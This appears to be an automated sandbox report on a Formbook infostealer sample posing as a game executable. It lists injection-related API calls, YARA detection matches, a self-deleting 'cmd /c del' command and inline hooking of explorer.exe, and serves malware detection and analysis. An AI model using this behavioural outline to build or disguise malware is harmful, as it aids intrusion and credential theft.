          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029560 NtWriteFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029760 NtOpenProcess,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102A770 NtOpenThread,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010296D0 NtCreateKey,
          Source: C:\Windows\explorer.exeCode function: 2_2_06D51A52 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA070 NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA120 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9FF0 NtReadFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DA9F40 NtCreateFile,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA06B NtClose,
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAA03A NtReadFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 0_2_032AC164
          Source: C:\Users\user\Desktop\emthree.exeCode function: 0_2_032AE5A2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 0_2_032AE5B0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041E423
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D73D
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01004120
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFB090
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010099BF
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A1002
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010BE824
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A830
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010120A0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B20A8
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B28EC
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FEF900
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100A309
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B2B28
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0100AB40
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101EBB0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A03DA
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010ADBD2
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0101ABD8
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010923E3
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0109FA2B
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B22AE
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4AEF
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B2D07
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B1D55
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01012581
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B25DD
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FF841F
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FFD5E0
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AD466
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010A4496
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00FE0D20
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010BDFCE
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B1FF1
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010AD616
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01006E30
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010B2EF7
          Source: C:\Windows\explorer.exeCode function: 2_2_06D51A52
          Source: C:\Windows\explorer.exeCode function: 2_2_06D49CF2
          Source: C:\Windows\explorer.exeCode function: 2_2_06D49CE9
          Source: C:\Windows\explorer.exeCode function: 2_2_06D50882
          Source: C:\Windows\explorer.exeCode function: 2_2_06D48072
          Source: C:\Windows\explorer.exeCode function: 2_2_06D48069
          Source: C:\Windows\explorer.exeCode function: 2_2_06D54A0C
          Source: C:\Windows\explorer.exeCode function: 2_2_06D4F152
          Source: C:\Windows\explorer.exeCode function: 2_2_06D4CB1F
          Source: C:\Windows\explorer.exeCode function: 2_2_06D4CB22
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6D466
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EB841F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F725DD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F62D82
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F71D55
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EA0D20
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F72D07
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F72EF7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC6E30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6D616
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F71FF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7DFCE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F728EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ED20A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F720A8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EBB090
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F7E824
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECA830
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F61002
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC99BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EC4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EAF900
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F64AEF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F722AE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F5FA2B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F523E3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F6DBD2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F603DA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDABD8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EDEBB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECAB40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04F72B28
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04ECA309
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D99E40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D92FB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD73D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAE423
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D92D90
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D92D87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04EAB150 appears 133 times
          Source: C:\Users\user\Desktop\emthree.exeCode function: String function: 00FEB150 appears 124 times
          Source: emthree.exeBinary or memory string: OriginalFilename vs emthree.exe
          Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs emthree.exe
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs emthree.exe
          Source: emthree.exeBinary or memory string: OriginalFilename vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276207579.0000000000BBB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs emthree.exe
          Source: emthree.exe, 00000001.00000002.276372802.00000000010DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs emthree.exe
          Source: emthree.exeBinary or memory string: OriginalFilename vs emthree.exe
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dll
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: emthree.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/3
          Source: C:\Users\user\Desktop\emthree.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\emthree.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6264:120:WilError_01
          Source: emthree.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\emthree.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\emthree.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: emthree.exeMetadefender: Detection: 35%
          Source: emthree.exeReversingLabs: Detection: 64%
          Source: unknownProcess created: C:\Users\user\Desktop\emthree.exe 'C:\Users\user\Desktop\emthree.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\emthree.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\emthree.exeProcess created: C:\Users\user\Desktop\emthree.exe {path}
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\emthree.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\emthree.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: emthree.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: emthree.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: emthree.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: emthree.exe, 00000001.00000002.276250317.0000000000FC0000.00000040.00000001.sdmp, rundll32.exe, 00000006.00000002.490418156.0000000004E80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: emthree.exe, rundll32.exe
          Source: Binary string: rundll32.pdb source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp
          Source: Binary string: rundll32.pdbGCTL source: emthree.exe, 00000001.00000002.276125323.0000000000AF0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: emthree.exe, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.emthree.exe.f40000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.0.emthree.exe.460000.0.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 1.2.emthree.exe.460000.1.unpack, Cycle_Jump_Game/Main.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Binary contains a suspicious time stampShow sources
          Source: initial sampleStatic PE information: 0xCD1766EF [Fri Jan 13 19:15:59 2079 UTC]
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D0E2 push eax; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D0EB push eax; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D095 push eax; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041D14C push eax; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_004082B3 push ebp; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0040E404 push edx; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041ECE9 push esp; ret
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0103D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04EFD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D982B3 push ebp; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD0EB push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD0E2 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD095 push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAD14C push eax; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02DAECE9 push esp; ret
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_02D9E404 push edx; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.70662287757

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xEA
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\emthree.exeProcess information set: NOOPENFILEERRORBOX
